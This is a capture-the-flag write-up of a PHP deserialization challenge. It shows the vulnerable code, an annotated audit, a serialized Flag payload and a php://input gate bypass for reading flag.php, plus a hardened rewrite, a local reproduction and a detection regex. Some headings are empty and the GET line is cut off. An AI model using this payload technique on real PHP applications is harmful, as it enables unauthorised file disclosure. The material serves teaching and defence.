I believe that anyone who studies security or works in it carries at least a little idealism and a sense of mission!!!
PHP deserialization vulnerability
level6-[local reproduction]-[file_get_contents]-[php://input pseudo-protocol]
1. Challenge description
```php
<?php
error_reporting(0);
include("flag.php");
class Flag{
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
            return ("good");
        }
    }
}
$txt = $_GET["txt"];
$password = $_GET["password"];
if(!isset($txt)){
    show_source(__FILE__);
    exit();
}
if(file_get_contents($txt,'r')==="welcome to the aegis"){
    echo "hello friend!<br>";
    $password = unserialize($password);
    echo $password;
}else{
    echo "something wrong! try it again";
}
```
2. Code audit
Reading through the code, annotated with what each line contributes to the chain:
```php
<?php
error_reporting(0);            // warnings are suppressed, so a failed file read fails silently
include("flag.php");           // the target file sits next to this script on the server
class Flag{
    public $file;              // set by unserialize() directly; no constructor, no validation
    public function __tostring(){   // magic method: runs whenever a Flag object is used as a string
        if(isset($this->file)){
            echo file_get_contents($this->file);   // sink: reads whatever path or wrapper $file names
            echo "<br>";
            return ("good");
        }
    }
}
$txt = $_GET["txt"];           // source 1: the path/wrapper handed to file_get_contents() below
$password = $_GET["password"]; // source 2: raw serialized data
if(!isset($txt)){
    show_source(__FILE__);
    exit();
}
// gate: the content read from $txt must equal the phrase; the 'r' argument is only a truthy use_include_path
if(file_get_contents($txt,'r')==="welcome to the aegis"){
    echo "hello friend!<br>";
    $password = unserialize($password);   // entry point: any class can be instantiated, no allowed_classes limit
    echo $password;                       // trigger: echo converts the object to a string, calling Flag::__tostring()
}else{
    echo "something wrong! try it again";
}
```
Walking through it in order, the analysis gives:
The four elements of the deserialization chain (entry point, controllable property, magic-method trigger, sink), from the analysis:
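The audit above points at two fixes: `$txt` must not reach `file_get_contents()` as an arbitrary path or stream wrapper, and user data must never reach `unserialize()`. The following hardened rewrite of the same endpoint is an added example, not the challenge's own code; it assumes PHP 8+ and a hypothetical `./uploads` directory as the only place the check is allowed to read from.

```php
<?php
declare(strict_types=1);
// Added example, not the challenge's code: hardened version of the vulnerable endpoint.
// Assumes PHP 8+ (str_starts_with) and a hypothetical ./uploads directory for check files.

const ALLOWED_DIR = __DIR__ . '/uploads';
const EXPECTED    = 'welcome to the aegis';

/** Fix 1: confine $txt to one directory and refuse every stream wrapper. */
function resolve_safe_path(string $userPath): ?string
{
    // "php://input", "data:", "http://", "phar://" all carry a scheme prefix; plain file names do not.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $userPath) === 1) {
        return null;
    }
    $base = realpath(ALLOWED_DIR);
    // basename() drops any directory component, so "../../flag.php" collapses to "flag.php".
    $full = realpath(ALLOWED_DIR . '/' . basename($userPath));
    if ($base === false || $full === false
        || !str_starts_with($full, $base . DIRECTORY_SEPARATOR)) {
        return null;   // missing file, or resolved outside ALLOWED_DIR (e.g. via a symlink)
    }
    return $full;
}

/** Fix 2: replace unserialize() with a JSON shape check; no class is ever instantiated from input. */
function parse_password(string $raw): ?string
{
    $data = json_decode($raw, true, 4);
    if (!is_array($data) || !isset($data['password']) || !is_string($data['password'])) {
        return null;   // a serialized object literal such as O:4:"Flag":... is not valid JSON and lands here
    }
    return $data['password'];
}

function handle(array $get): string
{
    if (!isset($get['txt'])) {
        return 'missing txt';
    }
    $path = resolve_safe_path((string) $get['txt']);
    if ($path === null || file_get_contents($path) !== EXPECTED) {
        return 'something wrong! try it again';
    }
    $password = parse_password((string) ($get['password'] ?? ''));
    if ($password === null) {
        return 'bad password format';
    }
    // $password is a plain string now; echoing it cannot invoke any magic method.
    return 'hello friend! ' . htmlspecialchars($password, ENT_QUOTES, 'UTF-8');
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: the wrapper and the serialized payload are both refused before any sink.
    var_dump(resolve_safe_path('php://input'));
    var_dump(parse_password('O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}'));
    var_dump(parse_password('{"password":"hunter2"}'));
} else {
    echo handle($_GET);
}
```

Run it with `php hardened.php` to exercise the two guards from the command line; under a web server `handle($_GET)` replaces the original request handling. The scheme check is deliberately broad: it is simpler to forbid every `scheme:` prefix than to enumerate the wrappers PHP registers.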
3. Solution
Step 1: analyze the flow
Step 2: construct the payload from the steps above
```php
<?php
class Flag{
    public $file='flag.php';   // the property that __tostring() will pass to file_get_contents()
}
$chen = new Flag();
echo serialize($chen);         // O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
```
Step 3: send the payload and read the flag
GET content:
?txt=php:
POST content:
welcome to the aegis
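To see the chain from step 2 fire locally, and to see what the one-argument mitigation does to it, the following stand-alone script is an added example, not part of the original post. It writes a constructed stand-in for flag.php to a temp file, so nothing real is read, and the `looks_like_serialized_object` helper is a hypothetical detection check, not something the challenge contains.

```php
<?php
declare(strict_types=1);
// Added example, not from the original post: local reproduction of the chain plus the mitigation.
// Runs from the CLI; the "flag" is a constructed temp file.

class Flag
{
    public $file;
    public function __toString(): string
    {
        // Same sink as the challenge: any string conversion of a Flag reads $file.
        return isset($this->file) ? (string) file_get_contents($this->file) : '';
    }
}

// Constructed stand-in for flag.php.
$tmp = tempnam(sys_get_temp_dir(), 'flag');
file_put_contents($tmp, 'flag{constructed-local-sample}');

// What step 2 produces, pointed at the temp file instead of flag.php.
$chen = new Flag();
$chen->file = $tmp;
$payload = serialize($chen);
echo "payload: $payload\n";

// 1) Default unserialize(): a real Flag comes back, and the string conversion calls __toString().
$obj = unserialize($payload);
echo 'unsafe: ', get_class($obj), ' -> ', (string) $obj, "\n";

// 2) Mitigation: allowed_classes => false turns every object into __PHP_Incomplete_Class,
//    which has no __toString(), so the file is never opened. (Casting it to string would throw,
//    so the check below is an instanceof test rather than an echo.)
$safe = unserialize($payload, ['allowed_classes' => false]);
echo 'safe:   ', get_class($safe), ' -> ',
    ($safe instanceof Flag) ? 'Flag instantiated, gadget live' : 'no Flag instantiated, file not read',
    "\n";

// 3) Hypothetical log/WAF check: a serialized object literal starts with O:<len>:"<Class>":<n>:{
function looks_like_serialized_object(string $s): bool
{
    return preg_match('/^O:\d+:"[A-Za-z_\\\\][\w\\\\]*":\d+:\{/', $s) === 1;
}
var_dump(looks_like_serialized_object($payload));
var_dump(looks_like_serialized_object('welcome to the aegis'));

unlink($tmp);
```

The `allowed_classes` option (PHP 7.0+) is the smallest change that breaks this particular chain without touching the class; it does not make `unserialize()` safe in general, which is why the hardened endpoint above the solution section drops it for JSON instead.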
Appendix: how to change the font size of HTTP messages in Burp Suite
4. Summary